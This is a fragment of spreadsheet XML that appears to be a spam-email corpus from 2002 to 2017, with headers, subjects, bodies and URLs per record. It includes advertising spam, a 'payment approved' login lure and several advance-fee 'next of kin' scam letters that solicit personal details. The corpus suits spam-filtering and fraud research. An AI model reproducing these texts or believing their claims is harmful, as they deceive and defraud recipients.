    <t>--=appc28ja3p6dz0bmkhsk6b117hp1hf Content-Type: text/plain; charset="iso-8859-1" Content-transfer-encoding: 8bit Dear Justin: Register.com is now offering its international business customers  .us - America's official Internet address. And when you purchase  a .us domain for your business, you get Register.com's Personalized  Business Email service for only $9.99 for the first year, a 66%  savings!* Click on this link to see if  jmason.us** is available: [URL]http://e.register.com[/URL] Every .us Registration Includes: * 3-page Web site * Web Address Forwarding - forward jmason.us to your current site * Online Domain Management - manage all your Web addresses in one place * 24/7 Customer Support 											 What makes .us unique and why do I need it? The .us domain is the only Web country code for the U.S.A. America  has more Internet users than any other country - reach American  customers with a Web address that speaks to them!     An online American identity will be a key contributor to your  efforts building and protecting a consistent global brand. Let  your prospects know you have an American presence. Request  an American identity online at jmason.us for your company.  Click on this link to find out more: [URL]http://e.register.com[/URL] What is the cost? America's Internet Address is being offered at special discounts: Save More By Adding More Years! Register For	  Your Discount***	   You'll Pay 2 Years                 10%                   $63  5 Years                 20%                   $139  10 Years                40%                   $209 Lock-in these introductory .us prices and for a limited  time, get an unforgettable .us email address like: Justin@jmason.us for only $9.99 for the first year. Why use a difficult-to-remember email like JohnsConsulting453@aol.com or JanesAccounting6782@hotmail.com? Use Invitation Code "EPR76S754"  when prompted during registration to receive this special price  on email. Remember - this is your chance to get jmason.us.  Click on the following link and act now - it may not be there tomorrow: [URL]http://e.register.com[/URL] ******************************************************** *Register.com's Email Service is only offered in one-year terms. **Register.com makes no representations as to whether or not these  names infringe or violate any trademark or intellectual property  rights. Domain names listed in this offer are subject to availability.  You must meet certain eligibility requirements to register a .us domain name. ***Discounts are based on com/net/org regular pricing. All registrations are subject to the terms of our Services Agreement,  located here: [URL]http://e.register.com[/URL] .US registrations are also subject to the .US Top Level Domain Terms  and Conditions, located here: [URL]http://e.register.com[/URL] To learn more about the disclosure and use of registration information in Register.com's published Privacy Notice, please click on this link: [URL]http://e.register.com[/URL] Our email messages are intended to keep you informed of new  promotions as they become available. To UNSUBSCRIBE, please click  on the link below, but by doing so, you may miss out on exciting new  products and services to come!  [URL]http://e.register.com[/URL] 2002 Register.com, Inc. All rights reserved. "America's Internet  Address" is a trademark of Neustar, Inc. --=appc28ja3p6dz0bmkhsk6b117hp1hf Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable .US Email International Business &amp; Email Promotion Dear Justin, Regis= ter.com is now offering its international business customers .us - America's official Internet address. And w= hen you purchase a .us domain for your=  business, you get Register.com's Personalized Business Email service for o= nly $9.99 for the first year, a 66% savings!*  =20     =   &lt;= img src=3D"[URL]http://216.21.229.207[/URL]" width=3D"241" height=3D"= 148" border=3D"0"&gt;   =A0= =A0WWW.=A0 .us  What makes .us unique and why do I = need it? The &lt;= font color=3D"#0033CC"&gt;.us domain is the only Web country=  code for the U.S.A. America has more Internet users than any other country=  - reach American customers with a Web address that speaks to them!=20=20= =20=20 An online American identity can be a key contributor to your efforts buildi= ng and protecting a consistent global brand. Let your prospects know you ha= ve an American presence. Request an American identity online at &lt;= b&gt;jmason.us** for your company= .=20=20=20=20 What is the cost? America's Internet Address is being offered at special discounts: =09 		 Save More By Addin= g More Years! =09=09 =09=09 		 =09=09 		Register For Your Discount*** You'll Pay =09 	 2 Years =09=09 		10% =09=09 		$63  =09=09 	 =09 	 5 Years =09=09 		20% =09=09 		$139 =09=09 	 =09 =09 	 10 Yea= rs =09=09 		40% =09=09 		$209 =09=09 	 =09 =09 Click her= e to lock-in these introductory prices for .us and for a limited time, get an unforgettable .us email address like: Justin@jmason.us for only $9.99 for the first year.=20 Why use a difficult to remember email like JohnsConsulting2345@aol.com or J= anesAccounting6782@hotmail.com? Use Invitation Code "EPR76S754" when=  prompted during registration to receive this special price on email.=20=20 Remember - this is your chance to get jmas= on.us.=20 Act now - it may not be there tomorrow. *Register.com's Email Service is only offered in one-year terms. **Register.com makes no representations as to whether or not these names in= fringe or violate any trademark or intellectual property rights. Domain nam= es listed in this offer are subject to availability. You must meet certain = eligibility requirements to register a .us domain name. ***Discounts are based on com/net/org regular pricing. All registrations are subject to the terms of our Services Agreement, locat= ed he= re. To learn more about the disclosure and use of registration information in R= egister.com's published Privacy Notice, please click here.  .US registrations are also subject to the .US Top Level Domain Terms=20 and Conditions, located here. Our email messages are intended to keep you informed of new promotions as t= hey become available. To UNSUBSCRIBE, please click here, but by doing so, yo= u may miss out on exciting new products and services to come!=20 ©2002 Register.com, Inc. All rights reserved. "America's Internet=20 Address" is a trademark of Neustar, Inc. --=appc28ja3p6dz0bmkhsk6b117hp1hf--</t>
  </si>
  <si>
    <t>http://e.register.com http://e.register.com http://e.register.com http://e.register.com http://e.register.com http://e.register.com http://e.register.com http://216.21.229.207</t>
  </si>
  <si>
    <t>4847</t>
  </si>
  <si>
    <t>To: ahuiz10342@aol.com\nFrom: marcehaye@netscape.net\nDate: Wed, 15 May 2002 12:52:27 -0400</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 12:52:27 -0400</t>
  </si>
  <si>
    <t>marcehaye@netscape.net</t>
  </si>
  <si>
    <t>ahuiz10342@aol.com</t>
  </si>
  <si>
    <t>Lowest possible interest rate for you--GUARANTEED.</t>
  </si>
  <si>
    <t>Some opportunities only come around every 30 years or so. This is one of those. Why? Because interest rates are definitely rising. Have you locked in the lowest rate (in THREE DECADES yet!) for your present mortgage? Rates haven't been this low in almost 3 decades. They may well never be this low again--ever. If you haven't taken this opportunity to secure the best possible rate on your home loan, you're simply letting money slip through your fingers. At a few special times, it is SO easy to save "big bucks"...and this is one of those times. Why continue to pay more than is necessary and continue to let future savings slip away?    We're a national mortgage provider. We're NOT a broker. As such, we can guarantee you the lowest possible rate and the best possible deal but only if you act NOW.   There is no charge, cost or obligation to see if this opportunity meets your needs. You can easily determine if a new loan makes sense for you, and exactly why, because we provide only "easy to understand" quotes (in "layman's terms", in other words).   We offer primary and secondary home loans and we will be happy to show you in "black and white" why your existing loan is the best for you or why you should replace it. Of course, there's no cost to you at all to share your time with us. None.  Take 2 minutes and use the link below that works best for you. For 2 minutes of your time, we'll show you how you can save you and your family "big bucks" today. This is a once-every-30-years opportunity. So don't delay and "miss the boat". Act now. Click_Here [URL]http://gd11.doubleclick.net[/URL];3518383;15-0;0;6177677;1-468|60;0|0|0;;[URL]http://61.129.81.99[/URL]   Sincerely, Mark. R. McCullough WMLN, Inc. __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! [URL]http://shopnow.netscape.com[/URL] Get your own FREE, personal Netscape Mail account today at [URL]http://webmail.netscape.com[/URL]</t>
  </si>
  <si>
    <t>http://gd11.doubleclick.net http://61.129.81.99 http://shopnow.netscape.com http://webmail.netscape.com</t>
  </si>
  <si>
    <t>4844</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Debt Relief&lt;DebtRelief@mail5.domainset&gt;\nDate: Wed, 15 May 2002 12:24:07 -0400</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 12:24:07 -0400</t>
  </si>
  <si>
    <t>Debt Relief&lt;DebtRelief@mail5.domainset&gt;</t>
  </si>
  <si>
    <t>Too many credit card bills! - this fixes that!</t>
  </si>
  <si>
    <t>Untitled Document       WE CAN HELP YOU  ...  Reduce Your              Monthly Payment up to 60%. Lower Your Credit              Card Interest Rates. Stop Late or Over              the Limit Fees. Combine Your              Bills into One Low Simple Payment. Provide a              Structured Payment Plan. Bring Your Account to              a Current Status. Private Handling of              Your Accounts. Put a Debt Specialist on Your Side. Not A Loan, No Credit Check, No        Property Needed.  This email is not sent unsolicited. You are receiving it because you requested receive this email by opting-in with our marketing partner. You will receive notices of exciting offers, products, and other options! However, we are committed to only sending to those people that desire these offers. If you do not wish to receive such offers  Click Here. or paste the following into any browser: [URL]http://65.162.84.5[/URL]  to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316</t>
  </si>
  <si>
    <t>http://65.162.84.5</t>
  </si>
  <si>
    <t>4852</t>
  </si>
  <si>
    <t>To: &lt;hankwall@juno.com&gt;, &lt;130174902@pager.icq.com&gt;,\nFrom: "judd" &lt;larry_brennan@yahoo.com&gt;\nDate: Wed, 15 May 2002 04:47:42 -1800</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 04:47:42 -1800</t>
  </si>
  <si>
    <t>"judd" &lt;larry_brennan@yahoo.com&gt;</t>
  </si>
  <si>
    <t>&lt;hankwall@juno.com&gt;, &lt;130174902@pager.icq.com&gt;,</t>
  </si>
  <si>
    <t>Hi Kathy, are you and your friend coming over?                   A</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \nCongratulations, You Won $30 Free  \nToday At The Internet's Best &amp; Most  \nTrusted On-= Line Casino!\n\nTo = Collect Your $30 Cash Click Here!\n\n![3D"Click](3D"[URL]http://members.triposd.uk[/URL]\n\n\n\nTo Collect Your $30 Cash = Click Here!\n\n\n\n![3D"Click](3D"[URL]http://members.triposd.uk[/URL]\n\n\n\n\n\n\n\n|\n\nThis= message is sent in compliance of the new e-mail bill:  \nSECTION 301 Per Section 301, Paragraph (a)(2)(= C) of S. 1618,  \nFurther transmissions to you by the sender of this= email maybe  \nstopped at no cost to you by entering your email addr= ess to  \nthe form in this email and clicking submit to be automatically  \nremoved. To be Removed f= rom our Opt-In mailing list. Please enter your email\naddress in the pr= ovided box below and click remove, thank you.  \n  \n---  \n  \n---  \n  \nYour E-mail Address Will Be Immediately Removed From = All Mailing Lists  \n  \n---  \n  \n\n\n</t>
  </si>
  <si>
    <t>http://members.triposd.uk http://members.triposd.uk</t>
  </si>
  <si>
    <t>4850</t>
  </si>
  <si>
    <t>To: &lt;yyyyarshall@llc.net&gt;, &lt;yyyyay@usit.net&gt;, &lt;yyyyais007@att.net&gt;,\nFrom: guardian4602@hotmail.com\nDate: Wed, 15 May 2002 04:30:51 -1600</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 04:30:51 -1600</t>
  </si>
  <si>
    <t>guardian4602@hotmail.com</t>
  </si>
  <si>
    <t>&lt;yyyyarshall@llc.net&gt;, &lt;yyyyay@usit.net&gt;, &lt;yyyyais007@att.net&gt;,</t>
  </si>
  <si>
    <t>MEN &amp; WOMEN, SPRUCE UP YOUR SEX LIFE!             GDOZ</t>
  </si>
  <si>
    <t>\n\n| **Vigoral Herbal Sex Enhancers**  \n **Direct from the lab to you!**  \n **We are Now Offering 3 Unique Products to help increase your moments w= ith\nthat special someone @ Only $24.99 each!!!** |\n![](3D"[URL]http://www.polwas.com[/URL]  \n---|---  \n  \n![](3D"[URL]http://www.polwas.com[/URL]") |\n![](3D"[URL]http://www.polwas.com[/URL]") |\n![](3D"[URL]http://www.polwas.com[/URL]")  \n---|---|---  \n![](3D"[URL]http://www.polwas.com[/URL]"=)  \n**Only $24.99 ea!** | ![](3D"[URL]http://www.polwas.com[/URL]")  \n**Only $24.99 ea!** | ![](3D"[URL]http://www.polwas.com[/URL]")  \n**Only $24.99 ea!**  \nM= en, Increase Your Energy Level &amp; Maintain Stronger Erections! | E= dible,\nSpecially Formulated Lubricant For Everyone! | W= omen, Heighten Your Sexual\nDesire &amp; Increase Your Sexual Climax!  \n  \n**CLICK HERE to Get it While it's HOT!**  \n---  \n  \nYou are receiving this special offer because you have provided permiss= ion to\nreceive email communications regarding special online promotions o= r offers.\nIf you feel you have received this message in error, or wi= sh to be removed\nfrom our subscriber list, Click HERE and you will be removed within less than\nthree business d= ays. Thank You and sorry for any inconvenience.  \n---\n\n</t>
  </si>
  <si>
    <t>http://www.polwas.com http://www.polwas.com http://www.polwas.com http://www.polwas.com http://www.polwas.com http://www.polwas.com http://www.polwas.com</t>
  </si>
  <si>
    <t>525</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Kate" &lt;info@galizx.org&gt;\nDate: Wed, 15 Mar 2017 10:37:13 -0300</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2017 10:37:13 -0300</t>
  </si>
  <si>
    <t>"Kate" &lt;info@galizx.org&gt;</t>
  </si>
  <si>
    <t>Your payment has been approved</t>
  </si>
  <si>
    <t>Your first payment has been approved.  To check your account balance, please  log in here. [[URL]http://galizx.org[/URL]]  Don't hesitate to contact us [[URL]http://galizx.org[/URL]] here if you  have any questions about your commission  payments or wish to change your payment settings.  Regards,  ---- Click this link to unsubscribe: [URL]http://galizx.org[/URL] Your first payment has been approved.  To check your account balance, please  log in here.    Don't hesitate to contact us here if you  have any questions about your commission  payments or wish to change your payment settings.    Regards,          ---- Click here to unsubscribe</t>
  </si>
  <si>
    <t>http://galizx.org http://galizx.org http://galizx.org</t>
  </si>
  <si>
    <t>1904</t>
  </si>
  <si>
    <t>To: johncastro1@mail.ru\nFrom: mr. John Castro &lt;johncastro1@mail.ru&gt;\nDate: Wed, 15 Mar 2006 16:36:26 +0300</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2006 16:36:26 +0300</t>
  </si>
  <si>
    <t>mr. John Castro &lt;johncastro1@mail.ru&gt;</t>
  </si>
  <si>
    <t>johncastro1@mail.ru</t>
  </si>
  <si>
    <t>YOUR RESPONSE.</t>
  </si>
  <si>
    <t>&gt;From Mr. John Castro\nAuditing and Account manager\nCredit Bank of Benin\nPhone:+229 97 89 18 35\nEmail:mr_johncastro@yahoo.fr\n\nMy Dear Friend,\n\nI am Mr. John B. Castro, the director in charge of auditing and accounting section of Capital trust bank Benin, Cotonou, Republic of Benin West Africa, and also a special account officer of Mr. Peter Lund,European. He was a seasoned contractor with Benin Cement Company, Cotonou, who unfortunately died in a plane crash of Union Transport Africaines Flight Boeing 727 in Cotonou, Republic of Benin on 25th December, 2003.You will read more stories about the crash on visiting this website:\n \n1.[URL]www.guardian.co.uk[/URL],1280,-3555201,00.html\n2.[URL]www.cnn.com[/URL]\n\nBefore his death on the 25th December 2003, Mr.Lund has a fixed deposit account with the bank and no other person know about this account or have any information relating to this account. The account has no beneficiary nor next-of-kin other than him, My investigation reveal that his supposed next-of-kin died along with him in the crash. Since then, I have made several enquiries to locate any of his extended relatives, this has also proved unsuccessful.\n\nAfter several unsuccessful attempts, I decided to contact you.I'm contacting you to assist in remittance of a dormant fund as the next of kin left behind by Mr.Lund so as not to allow the bank confiscate or declare the funds unserviceable in the account according to Benin Republic financial law on unclaimed bills which the government usually map out for the purchase of ammunitions which are the major course of conflicts in the west of  Africa. Consequently, I'm seeking your consent to present you as the next-of-kin to the deceased customer so that the outstanding fixed deposit (US$24.1M) will be remitted into any designated account of yours to be shared by both of us in the ratio of 60% to me and 40% for you.\n\nI have all necessary legal documents to back up this claim. All that is required of you is absolute honesty, total commitment, co-operation &amp; absolute confidentiality. Be rest-assured that this transaction will be executed under legitimate arrangement that will protect both parties from breach of the law and it is 100% risk free and attracts no authorities and every information you will require as the next of kin will be forwarded to you after your final acceptance to help me champion this deal. If this proposal is acceptable to you, kindly email your following information to me.\n\na. Full Name(s)\n\nb. Direct phone &amp; fax number(s)\n\nc. Your personal email and your complete home address.\n\nThank you for your cooperation until I read from you. You may also reach me at my private mailbox and call me for further information on +229 97  89 18 35\nmr_johncastro@yahoo.fr\n\nSincerely yours,\n\nMr. John Castro\n\n\n</t>
  </si>
  <si>
    <t>www.guardian.co.uk www.cnn.com</t>
  </si>
  <si>
    <t>1902</t>
  </si>
  <si>
    <t>To: sigmod-pods06-webmaster@UM\nFrom: Mr.kelly wood &lt;kelly_wood@yahoo.com&gt;\nDate: Wed, 15 Mar 2006 15:56:18 +0800</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2006 15:56:18 +0800</t>
  </si>
  <si>
    <t>Mr.kelly wood &lt;kelly_wood@yahoo.com&gt;</t>
  </si>
  <si>
    <t>sigmod-pods06-webmaster@UM</t>
  </si>
  <si>
    <t>urgent offer..</t>
  </si>
  <si>
    <t>Westpac Banking Corporation, 63 St. Mary Axe London EC3A 8LE  I am Mr.kelly wood ,Department of Foreign Operations, Westpac Banking Corporation London,an affiliate of Global Funds Management.  On January 6th 2001, one Mr. Joseph Huber, an American National,a consultant/contractor with Gardiner &amp; Theobald,a leading firm of project and cost management consultants, made a numbered time (Fixed) Deposit, valued at ?6,500,000.00 (Twenty-six Million, Five Hundred Thousand Pounds) for twelve calender months in my Bank Branch.Upon Maturity, we sent a routine notification to his forwarding address but got no reply. After a month, we sent a reminder and finally we discovered from his contract employers (Gardiner &amp; Theobald) that Mr. Joseph Huber was aboard the, American Airlines Flight 587 which crashed into a residential area near John F. Kennedy International Airport on November 12,2001.[URL]www.cnn.com[/URL]  After investigation, it was discovered that he died without making a WILL and all attempts to trace his next of kin proved fruitless. On further investigation, it was discovered that Late Mr.Joseph Huber did not declare any next of kin or relations in all his official documents, including his Bank Deposit paper work here at the Bank. The total sum, ?6,500,000.00 is still in my bank and the interest is being rolled over with the principal sum at the end of each year. No one will ever come forward to claim it. In accordance with the Federal banking Laws and constitution,the money will revert to the ownership of the Government if nobody applies as the next of Kin to claim the funds.  Consequently, I shall present you as a foreign partner to stand in as the next of kin to late Mr. Joseph Huber so that you and I can benefit from the fruits of this man's labour. Upon acceptance of this proposal, I shall give detailed information on how this deal would be carried out.We shall employ the services of a solicitor for the drafting of the LAST WILL &amp; TESTAMENT of Late Mr.Joseph Huber and to obtainallother relevant papers in your name for the necessary documentation for payment approval in my bank headquarters in your favour.  The money will be shared in the ratio:Sixty percent for me, thirty five percent for you and five percent for any arising contigencies during the course of this transaction.  I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law as I will use my position in the bank to secure approvals and guarantee the successful execution of this transaction. Please be informed that your utmost confidentiality is required. If this interests you, please reply me immediately via the private email address kelly_wood7@excite.com  and please include your private telephone number for voice contact and fax number so I can provide you with more details and relevant documents that will help you understand the transaction.  Awaiting your urgent reply.  Thanks.  Best regards,  Wood.</t>
  </si>
  <si>
    <t>www.cnn.com</t>
  </si>
  <si>
    <t>1366</t>
  </si>
  <si>
    <t>To: meil123@eresmas.com\nFrom: Olsom Olsom Berghart &lt;meil123@eresmas.com&gt;\nDate: Wed, 15 Jun 2005 17:44:22 +0000</t>
  </si>
  <si>
    <t>Wed, 15 Jun 2005 17:44:22 +0000</t>
  </si>
  <si>
    <t>Olsom Olsom Berghart &lt;meil123@eresmas.com&gt;</t>
  </si>
  <si>
    <t>meil123@eresmas.com</t>
  </si>
  <si>
    <t>Business offer</t>
  </si>
  <si>
    <t>Gooday,  I am Mr Olsom Berghart a personal treasurer to Mikhail Khodorkovsky the richest man in Russia and owner of the following companies:Chairman CEO: YUKOS OIL (Russian Most Largest Oil Company)Chairman CEO: Menatep SBP Bank (A well reputable financial institution with its branches all over the world)  SOURCE OF FUNDS: I have a profiling amount in an excess of US$100.5M, which I seek your partnership in accommodating for me. You will be rewarded with 4% of the total sum for your partnership. Can you be my partner on this?  INTRODUCTION OF MY SELF As a personal consultant to him, authority was handed over to me in transfer of money of an American oil merchant for his last oil deal with my boss Mikhail Khodorkovsky. Already the funds have left the shore of Russia to an European private bank where the final crediting is expected to be carried out.  While I was on the process, My Boss got arrested for his involvement in politics by financing the leading and opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party led by Gregor Yavlinsky) which poses treat to President Vladimir Putin second tenure as Russian president.  You can catch more of the story on this website: [URL]http://www.yukos.com[/URL] [URL]http://newsfromrussia.com[/URL]  YOUR ROLE: All I need from you is to stand as the beneficiary of the above quoted sum and I will re-profile the funds with your name, which will enable the European bank transfer the sum to you. I have decided to use this sum to relocate to American continent and never to be connected to any of Mikhail Khodorkovsky conglomerates.  The transaction has to be concluded in 2 weeks before Mikhail Khodorkovsky is out on bail. As soon as I confirm your readiness to conclude the transaction with me, I will provide you with the details.  Thank you very much.  Regards, Olsom Berghart(Mr)  NB: Please contact me through this secure email: berolsom@indiatimes.com -----------------------------------------------------------------------Encuentra tu casa rápida y cómodamente. Miles de viviendas te están esperando en [URL]http://www.portae.com[/URL]</t>
  </si>
  <si>
    <t>http://www.yukos.com http://newsfromrussia.com http://www.portae.com</t>
  </si>
  <si>
    <t>58</t>
  </si>
  <si>
    <t>To: olu@mailservice.ms\nFrom: olu@mailservice.ms\nDate: Wed, 15 Jan 2003 14:58:04 -0500</t>
  </si>
  <si>
    <t>Wed, 15 Jan 2003 14:58:04 -0500</t>
  </si>
  <si>
    <t>olu@mailservice.ms</t>
  </si>
  <si>
    <t xml:space="preserve">A RELIABLE AND REPUTABLE PERSON </t>
  </si>
  <si>
    <t>\n\nNAME:DR. OLUSEGUN SMITH\ndr.olusegun.smith@caramail.com\n\n\n     REQUEST FOR ASSISTANCE: _STRICTLY CONFIDENTIAL\n\n \n  I AM DR. OLUSEGUN SMITH, THE CHAIRMAN OF CONTRACT \nAWARD AND REVIEW COMMITTEE SET UP BY THE FEDERAL \nGOVERNMENT OF NIGERIA UNDER THE NEW CIVILIAN \nDISPENSATION TO AWARD NEW CONTRACTS AND REVIEW \nEXISTING ONES. I CAME TO KNOW OF YOU IN MY SEARCH FOR \nA RELIABLE AND REPUTABLE PERSON TO HANDLE A VERY \nCONFIDENTIAL TRANSACTION, WHICH INVOLVES THE TRANSFER \nOF A HUGE SUM OF MONEY TO A FOREIGN ACCOUNT. \nTHERE WERE SERIES OF CONTRACTS EXECUTED BY A \nCONSORTIUM OF MULTI-NATIONALS IN THE OIL INDUSTRY IN \nFAVOUR OF N.N.P.C. THE ORIGINAL VALUE OF THESE \nCONTRACTS WERE DELIBRATELY OVER INVOICED TO THE SUM \nOF USD$25,000,000.00 (TWENTY FIVE MILLION UNITED STATE\nDOLLARS). THIS AMOUNT HAS NOW BEEN APPROVED AND IS \nNOW READY TO BE TRANSFERED BEING THAT THE COMPANIES \nTHAT ACTUALLY EXECUTED THESE CONTRACTS HAVE BEEN FULLY\nPAID AND THE PROJECTS OFFICIALLY COMMISSIONED. \nCONSEQUENTLY, MY COLLEAGUES AND I ARE WILLING TO \nTRANSFER THE TOTAL AMOUNT TO YOUR ACCOUNT FOR \nSUBSEQUENT DISBURSEMENT, SINCE WE AS CIVIL SERVANTS \nARE PROHIBITED BY THE CODE OF CONDUCT BUREAU (CIVIL \nSERVICE LAW) FROM OPERATING AND/OR OPENING FOREIGN \nACCOUNTS IN OUR NAMES. NEEDLESS TO SAY, THE TRUST \nREPOSED ON YOU AT THIS JUNCTURE IS ENORMOUS, IN \nRETURN, WE HAVE AGREED TO OFFER YOU 30% OF THE \nTRANSFERED SUM, WHILE 10% SHALL BE SET ASIDE FOR \nINCIDENTAL EXPENSES (INTERNAL AND EXTERNAL) BETWEEN \nBOTH PARTIES IN THE COURSE OF THE TRANSACTION YOU WILL\nBE MANDATED TO REMIT THE BALANCE TO OTHER ACCOUNTS IN \nDUE COURSE. \nMODALITIES HAVE BEEN WORKED OUT AT THE HIGHEST LEVEL \nOF THE MINISTRY OF FINANCE AND THE CENTRAL BANK OF \nNIGERIA FOR THE IMMEDIATE TRANSFER OF THE FUNDS WITHIN\n10 WORKING DAYS SUBJECT TO YOUR SATISFACTION OF THE \nABOVE STATED TERMS. OUR ASSURANCE IS THAT YOUR ROLE IS\nRISK FREE.TO ACCORD THIS TRANSACTION THE LEGALITY IT \nDESERVES AND FOR MUTUAL SECURITY OF THE FUNDS THE \nWHOLE APPROVAL PROCEDURES WILL OFFICIALLY AND LEGALLY \nPROCESSED WITH YOUR NAME OR THE NAME OF ANY COMPANY \nYOU MAY NOMINATE AS THE BONEFIDE BENEFICIARY. \nONCE MORE I WANT YOU TO UNDERSTAND THAT HAVING PUT IN \nOVER TWENTY FIVE YEARS IN THE CIVIL SERVICE OF MY \nCOUNTRY, I AM AVERSE TO HAVING MY IMAGE AND CAREER \nDENTED. THIS MATTER SHOULD THEREFORE BE TREATED WITH \nUTMOST SECRECY AND URGENCY IT DESERVES.AND I WILL LIKE\nYOU TO SEND ME YOUR MAIL TO MY PRAIVTE BOX \ndr.olusegun.smith@caramail.com\nI WANT TO ASSURE YOU THAT THIS BUSINESS PROPOSAL IS \n100% RISK FREE AS WE HAVE DONE OUR HOME WORK PROPERLY \nI QUITE BELIEVE THAT YOU WILL PROTECT OUR INTEREST BY \nTAKING THIS DEAL STRICTLY CONFIDENTIAL, AS WE ARE \nSTILL IN GOVERNMENT SERVICE, WHICH WE INTEND TO RETIRE\nFROM.KINDLY EXPEDITE ACTION AS WE ARE BEHIND SCHEDULE \nTO ENABLE US INCLUDE THIS TRANSFER IN THE SECOND BATCH\nWHICH WOULD CONSTITUTE THE FIRST QUARTER PAYMENTS FOR\nTHE 2003 FINANCIAL YEAR. THANKS AND GOD BLESS. \n\nDR.OLUSEGUN SMITH\n\n\nNB: \nBUT IF YOU KNOW YOU ARE INTERESTED LET ME KNOW. LIST \nYOUR PHONE &amp; FAX NUMBERS SO WE MAY \nCOMMUNICATE WITH YOU. THIS IS IMPORTANT AS WE WOULD \nHAVE TO TALK ABOUT THE MODALITIES OF THE TRANSACTION. \nWAITING TO HEAR FROM YOU. \n\n\n-------------------------------------------------\nThis mail sent through MailService.MS -&gt; [URL]http://www.MailService.ms[/URL] \n\n</t>
  </si>
  <si>
    <t>http://www.MailService.ms</t>
  </si>
  <si>
    <t>1790</t>
  </si>
  <si>
    <t>To: nan\nFrom: tanko usman &lt;tankousman_002@hotmail.com&gt;\nDate: Wed, 15 Feb 2006 19:39:12 +0000</t>
  </si>
  <si>
    <t>Wed, 15 Feb 2006 19:39:12 +0000</t>
  </si>
  <si>
    <t>tanko usman &lt;tankousman_002@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT REPLY NEEDED </t>
  </si>
  <si>
    <t>Dear Friend,\n\nI know this letter may beat your imagination, as we have no previous \ncorrespondence. Iam contacting you to see if I can confide in you. To \nintroduce my self, I am Mr Ahmed Ibrahim Tarlor. the son of the late former \nAngolian Diamond Merchant, so now I will like to do this transaction with \nyou as some one who have been into production.\n\nMy father the late Diamond Merchant made the sum of $15.7 USD in cash. I \nwant to invest this money in your country with your assistance. This money \nin question has been in the security company since my fathers death until \nthis moment.\n\nI am confused on how to handle this huge amount of money and also what to do \nwith it as I don't have any one to confide in, here in Ouagadougou \nBurkina-Faso. May I there fore use this medium to\nrequest from you if you will be disposed enough to help me keep this huge \namount of money in your country or any other place of your choice.\n\nI intend to invest this money on any profitable business venture. I will \ngive you 35% of the total money for assisting me. For the confirmation of \nyour willingness to assist me reply with your telephone and fax numbers for \neasy communication.\n\nBest Regards,\n\nMR.TANKO USMAN\n00226-76-50-56-27\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1041</t>
  </si>
  <si>
    <t>To: jberg@mail.bulgaria.com\nFrom: Dr John Berg &lt;jberg@mail.bulgaria.com&gt;\nDate: Wed, 15 Dec 2004 02:05:10 -0800</t>
  </si>
  <si>
    <t>Wed, 15 Dec 2004 02:05:10 -0800</t>
  </si>
  <si>
    <t>Dr John Berg &lt;jberg@mail.bulgaria.com&gt;</t>
  </si>
  <si>
    <t>jberg@mail.bulgaria.com</t>
  </si>
  <si>
    <t>urgent</t>
  </si>
  <si>
    <t>Dear Sir,  I am Dr. John Berg a personal assistant to Mikhail Khodorkovsky the richest man in Russia and owner of the following companies: Chairman CEO: YUKOS OIL (Russian Most Largest Oil Company) Chairman CEO: Menatep SBP Bank (A well reputable financial institution with its branches all over the world) SOURCE OF FUNDS: I have a profiling amount in an excess of US$200.5M, which I seek your partnership in accommodating for me. You will be rewarded with 15% of the total sum for your partnership. Can you be my partner on this? INTRODUCTION OF MY SELF As a personal consultant to him, authority was handed over to me in transfer of money of an American oil merchant for his last oil deal with my boss Mikhail Khodorkovsky. Already the funds have left the shore of Russia to an European private bank where the final crediting is expected to be carried out. While I was on the process, My Boss got arrested for his involvement in politics by financing the leading and opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party led by Gregor Yavlinsky which poses treat to President Vladimir Putin second tenure as Russian president. You can catch more of the story on this website:  [URL]http://www.opendemocracy.net[/URL]  [URL]http://newsfromrussia.com[/URL]  YOUR ROLE: All I need from you is to stand as the beneficiary of the above quoted sum and I will re-profile the funds with your name, which will enable the European bank transfer the sum to you. I have decided to use this sum to relocate to American continent and never to be connected to any of Mikhail Khodorkovsky conglomerates. The transaction has to be concluded in 2 weeks before Mikhail Khodorkovsky is out on bail. As soon as I confirm your readiness to conclude the transaction with me, I will provide you with the details.  Best Regards, Dr. John Berg.  NB: Do contact me through this secure email  jberg@mail.bulgaria.com . _______________________________________________________ Free e-mail by Bulgaria.com at [URL]http://mail.bulgaria.com[/URL]</t>
  </si>
  <si>
    <t>http://www.opendemocracy.net http://newsfromrussia.com http://mail.bulgaria.com</t>
  </si>
  <si>
    <t>3276</t>
  </si>
  <si>
    <t>To: nan\nFrom: adams swill &lt;adams5swill@hotmail.com&gt;\nDate: Wed, 15 Aug 2007 02:20:56 -0700</t>
  </si>
  <si>
    <t>Wed, 15 Aug 2007 02:20:56 -0700</t>
  </si>
  <si>
    <t>adams swill &lt;adams5swill@hotmail.com&gt;</t>
  </si>
  <si>
    <t>DEAR GOOD FRIEND PLEASE REPLY BACK</t>
  </si>
  <si>
